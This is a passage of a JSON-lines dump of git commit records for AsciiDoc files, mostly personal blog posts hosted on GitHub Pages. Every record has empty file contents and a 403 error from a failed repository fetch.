2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9736cdd15fbc933e30aa47664a0621177673a18e","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fbfc0d3a15508881db0a3da249d7ff6d83d0632","subject":"added docs","message":"added docs\n","repos":"puddingspudding\/scrum-poker,puddingspudding\/scrum-poker","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puddingspudding\/scrum-poker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b91f7f9089e7d88442fde4123f2e71ab1aaf0ee","subject":"Update 2011-05-17-The-Rationale-for-Testing.adoc","message":"Update 
2011-05-17-The-Rationale-for-Testing.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-05-17-The-Rationale-for-Testing.adoc","new_file":"_posts\/2011-05-17-The-Rationale-for-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea3596a9314bf5a045aa898f55878d9cc19545db","subject":"Update 2017-01-26-Updating-the-blog-version.adoc","message":"Update 2017-01-26-Updating-the-blog-version.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23e1cec22833889633199901366f8edbe79c301c","subject":"Update 2015-03-27-Road-to-the-OCR-World-Cup.adoc","message":"Update 2015-03-27-Road-to-the-OCR-World-Cup.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-27-Road-to-the-OCR-World-Cup.adoc","new_file":"_posts\/2015-03-27-Road-to-the-OCR-World-Cup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33b25e3def99ad6e9a8cc86769147b0fd241c6d1","subject":"Update 2017-08-02-Network-Information-A-P-I.adoc","message":"Update 2017-08-02-Network-Information-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-08-02-Network-Information-A-P-I.adoc","new_file":"_posts\/2017-08-02-Network-Information-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd5c0a226d95e0cd8daf3cd09d070cb69a4b9ae4","subject":"Create 2017-04-03-forge-3.6.1.final.asciidoc","message":"Create 2017-04-03-forge-3.6.1.final.asciidoc","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-04-03-forge-3.6.1.final.asciidoc","new_file":"news\/2017-04-03-forge-3.6.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"bc2dab2d82a0ac3201dde6567d04b6dc0700c205","subject":"y2b create post The iPhone Spy Camera","message":"y2b create post The iPhone Spy Camera","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-14-The-iPhone-Spy-Camera.adoc","new_file":"_posts\/2016-04-14-The-iPhone-Spy-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be714b3856a4e8617e99b5e049fd8ff910b005c","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f839ed54ab887aa17eb3803ffc80dd43ea9150c9","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9ca197a4ccc7d97ac8b00bb624e19f2fe29f2b6","subject":"Change gorm version","message":"Change gorm version","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/commonChangeGormVersion.adoc","new_file":"src\/main\/docs\/commonChangeGormVersion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67af213b5dc80c5a291d07f5d65af5dd954b6cf0","subject":"add a readme to pushover channel","message":"add a readme to pushover channel\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"channels\/boteco-channel-pushover\/README.adoc","new_file":"channels\/boteco-channel-pushover\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4453804eaf3e46fcf564a2bc01a579e3dbdb07e0","subject":"Update 2017-03-15-What-Init-system-am-I-using.adoc","message":"Update 2017-03-15-What-Init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-15-What-Init-system-am-I-using.adoc","new_file":"_posts\/2017-03-15-What-Init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17d1d56a326debf3cd2d4d0844ef4c30f9e82f3b","subject":"Add files via upload","message":"Add files via upload\n\nCreated aws-multitier, copy of 
aws-single-ami","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-multitier.adoc","new_file":"userguide\/tutorials\/aws-multitier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f5ac4f26e7c3757b2c18fab0ffbd593da25f767","subject":"y2b create post PlayStation 3 Blu-ray Remote 2.0 Unboxing (2011)","message":"y2b create post PlayStation 3 Blu-ray Remote 2.0 Unboxing (2011)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-10-PlayStation-3-Bluray-Remote-20-Unboxing-2011.adoc","new_file":"_posts\/2011-12-10-PlayStation-3-Bluray-Remote-20-Unboxing-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e6bc01fd7a344549754e38fd8cee2a68c93d885","subject":"Update 08-01-2019-Meinung-uber-Meinung.adoc","message":"Update 08-01-2019-Meinung-uber-Meinung.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/08-01-2019-Meinung-uber-Meinung.adoc","new_file":"_posts\/08-01-2019-Meinung-uber-Meinung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093786e4c3de70159c89edfdfc30eef2f15c643f","subject":"Update 2016-02-29-Creating-Complex-CSS3-Animations.adoc","message":"Update 2016-02-29-Creating-Complex-CSS3-Animations.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-02-29-Creating-Complex-CSS3-Animations.adoc","new_file":"_posts\/2016-02-29-Creating-Complex-CSS3-Animations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cf0b808d7b8efa509d8f135f2e26e8129eed39","subject":"y2b create post Holiday Update \\\/ What's Next?","message":"y2b create post Holiday Update \\\/ What's Next?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-28-Holiday-Update--Whats-Next.adoc","new_file":"_posts\/2011-12-28-Holiday-Update--Whats-Next.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d24340735de3ebf28fd3bc6e36f260bbe1c04d0","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 
2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f16c83efb42a371cf8b2d80a56b64f3cceff62bc","subject":"DBZ-1547 02\/2019 Newsletter","message":"DBZ-1547 02\/2019 Newsletter\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-10-17-debezium-newsletter-02-2019.adoc","new_file":"blog\/2019-10-17-debezium-newsletter-02-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ea50252dd470121a157d95f246785a176712a9","subject":"y2b create post I NEED YOUR HELP!","message":"y2b create post I NEED YOUR HELP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-05-I-NEED-YOUR-HELP.adoc","new_file":"_posts\/2011-12-05-I-NEED-YOUR-HELP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13e7ad35a8fc1df90e53f87f8dbd7bed2549e3bb","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d4788c475162f46625176bbef8ffa4c36a7f6d0","subject":"create post THE CRAZIEST HEADPHONES EVER","message":"create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_file":"_posts\/2018-02-26-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7581ab852fe4e2ca51d8a24706056d74e802f06a","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa253d770a8197a44bbe8257b20fd732e70885b0","subject":"Update 2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","message":"Update 2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","new_file":"_posts\/2017-05-10-Geschaft-Korruption-Lobbyismus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cec6fb8331d340a4224618c6be9fa16a086fe6d9","subject":"Update 2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","message":"Update 2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","new_file":"_posts\/2017-06-06-Your-Java-EE-app-on-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1da48550cebb871f78c0a9847d3da2d5a9e53b8","subject":"y2b create post What If You Could Hear What Others Are Hearing?","message":"y2b create post What If You Could Hear What Others Are Hearing?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-19-What-If-You-Could-Hear-What-Others-Are-Hearing.adoc","new_file":"_posts\/2017-02-19-What-If-You-Could-Hear-What-Others-Are-Hearing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255382862d8ddf57112bb519461ea26fd0bc961e","subject":"job #11634 - started writing design note","message":"job #11634 - started writing design 
note","repos":"xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11634_signal_mark_sync\/11634_mark_sync_dnt.adoc","new_file":"doc-bridgepoint\/notes\/11634_signal_mark_sync\/11634_mark_sync_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93a40e0b1a0d30018fb55937a0672eb5327e6a14","subject":"Update 2016-04-04-The-Power-of-Peers.adoc","message":"Update 2016-04-04-The-Power-of-Peers.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io","old_file":"_posts\/2016-04-04-The-Power-of-Peers.adoc","new_file":"_posts\/2016-04-04-The-Power-of-Peers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21a64636f05490502a1af100c933343fda8f36c3","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus-5T-Lava-Red-Unboxing--500-Cant-Go-Further.adoc","new_file":"_posts\/2018-01-19-OnePlus-5T-Lava-Red-Unboxing--500-Cant-Go-Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8868da1c0ebe032a17b5f0661ec142152cae87d9","subject":"Create 2015-04-14-1.adoc","message":"Create 
2015-04-14-1.adoc","repos":"lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-14-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-14-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4654d19c3dbab8f80dff7456e116bdb7e464cc23","subject":"created asciidoc manual","message":"created asciidoc manual\n","repos":"kenliu\/grails-elastic-beanstalk","old_file":"src\/asciidoc\/manual.asciidoc","new_file":"src\/asciidoc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kenliu\/grails-elastic-beanstalk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f8f64cc7a8b44b807a7a530650bc2307b172bd7","subject":"Update 2016-09-16-innovation-Engineer-Aruaru.adoc","message":"Update 2016-09-16-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-16-innovation-Engineer-Aruaru.adoc","new_file":"_posts\/2016-09-16-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e4dc141fd8f4b7abb375cc09ec4f2125203ec7f","subject":"Update 2017-10-20-Severin-Tagliante-Saracino.adoc","message":"Update 2017-10-20-Severin-Tagliante-Saracino.adoc","repos":"severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io","old_file":"_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc","new_file":"_posts\/2017-10-20-Severin-Tagliante-Saracino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/severin31\/severin31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0be96a767da1bd05016ac22def49128652ea213c","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8988ba1a89e42fb42f65678a683b3bf1c0f34f56","subject":"Update 2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","message":"Update 2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","new_file":"_posts\/2015-03-02-Create-Ubuntu-VM-on-MS-Azure-and-Login-onto-VM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32c7ba8fd392a82f1502e7c9dbcfebb1895f4cbe","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61445b0d1388439e2655b2fc3e75b8219ea72b65","subject":"Minor doc improvement","message":"Minor doc 
improvement\n","repos":"Sanne\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"23b31a04e121aa328c9a31ef98e32b95bfc7a3b6","subject":"y2b create post The Customizable Android Phone You've Never Heard Of...","message":"y2b create post The Customizable Android Phone You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-02-The-Customizable-Android-Phone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-09-02-The-Customizable-Android-Phone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 